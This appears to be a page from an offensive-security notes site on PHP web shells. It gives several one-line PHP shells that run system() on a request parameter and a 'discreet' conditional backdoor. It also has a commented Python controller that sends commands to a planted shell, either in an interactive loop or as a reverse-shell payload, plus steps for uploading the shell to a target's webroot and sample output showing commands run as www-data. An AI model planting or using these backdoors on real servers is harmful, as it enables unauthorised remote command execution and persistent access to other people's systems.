PHP

FORMAT

DIRECT

root@oco:~$ nano phpWebShell.php
 ...
 <?php system($_REQUEST["cmd"]); ?>
 ...
 
#access
root@oco:~$ curl http://{targetSite:port}?cmd=id

root@oco:~$ echo '<?php echo system($_REQUEST['cmd']);?>' > shell.php

GET REQUEST

root@oco:~$ echo '<?php system($_GET["cmd"]); ?>' > shell.php

 * the system() function which takes the URL parameter
   cmd as an input and executes it as a system command.
   
 * this is a non-interactive shell as it runs a single command per request 
   and returns the result. there's no back-and-forth, ongoing interaction 
   like in a terminal or shell.

CONDITIONAL

acts as a standalone backdoor. It listens for a specific cmd parameter in HTTP requests and executes system-level commands only if that condition is met—making it simple, discreet, and effective on its own.

root@oco:~$ nano backdoor.php
 <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

OPTIONAL CONTROLLER

this optional piece isn't required for the PHP shell to function. Instead, it serves as a convenience tool—designed to automate interaction with the PHP shell. It offers optional features like sending a one-time payload or launching an interactive loop, simplifying command execution and improving operator efficiency during post-exploitation.

In essence, the PHP shell is the implant, and the Python script is an optional controller that streamlines engagement.

root@oco:~$ nano webShell.py
import argparse, time, requests, os                                                                                                                              # imports four modules argparse (used for system arguments), time (used for time), requests (used for HTTP/HTTPs Requests), os (used for operating system commands)
parser = argparse.ArgumentParser(description="Interactive Web Shell for PoCs")                                                                                   # generates a variable called parser and uses argparse to create a description
parser.add_argument("-t", "--target", help="Specify the target host E.g. http://<TARGET IP>:3001/uploads/backdoor.php", required=True)                           # specifies flags such as -t for a target with a help and required option being true
parser.add_argument("-p", "--payload", help="Specify the reverse shell payload E.g. a python3 reverse shell. IP and Port required in the payload")               # similar to above
parser.add_argument("-o", "--option", help="Interactive Web Shell with loop usage: python3 web_shell.py -t http://<TARGET IP>:3001/uploads/backdoor.php -o yes") # similar to above
args = parser.parse_args()                                                                                                                                       # defines args as a variable holding the values of the above arguments so we can do args.option for example.
if args.target == None and args.payload == None:                                                                                                                 # checks if args.target (the url of the target) and the payload is blank if so it'll show the help menu
    parser.print_help()                                                                                                                                          # shows help menu
elif args.target and args.payload:                                                                                                                               # elif (if they both have values do some action)
    print(requests.get(args.target+"/?cmd="+args.payload).text)                                                                                                  ## sends the request with a GET method with the targets URL appends the /?cmd= param and the payload and then prints out the value using .text because we're already sending it within the print() function
if args.target and args.option == "yes":                                                                                                                         # if the target option is set and args.option is set to yes (for a full interactive shell)
    os.system("clear")                                                                                                                                           # clear the screen (linux)
    while True:                                                                                                                                                  # starts a while loop (never ending loop)
        try:                                                                                                                                                     # try statement
            cmd = input("$ ")                                                                                                                                    # defines a cmd variable for an input() function which our user will enter
            print(requests.get(args.target+"/?cmd="+cmd).text)                                                                                                   # same as above except with our input() function value
            time.sleep(0.3)                                                                                                                                      # waits 0.3 seconds during each request
        except requests.exceptions.InvalidSchema:
            print("Invalid URL Schema: http:// or https://")
        except requests.exceptions.ConnectionError:
            print("URL is invalid")

UPLOAD METHODS

SITE UPLOAD METHOD

once the shell script has been tailored with specific IPs and Port, etc it must be uploaded to the target's web directory (webroot) to execute the script through the web browser

root@oco:~$ BROWSER > {targetSite:port} > File Upload
 ...

RCE METHOD

root@target:~$ echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
 ...

ACCESS

BROWSER METHOD

root@oco:~$ BROWSER > http://SERVER_IP:PORT/shell.php?cmd=id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

CLI METHOD

root@oco:~$ curl {targetSite:port}/phpWebShell.php?cmd=id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

PreviousWEB SHELL NextJSP

Last updated 5 months ago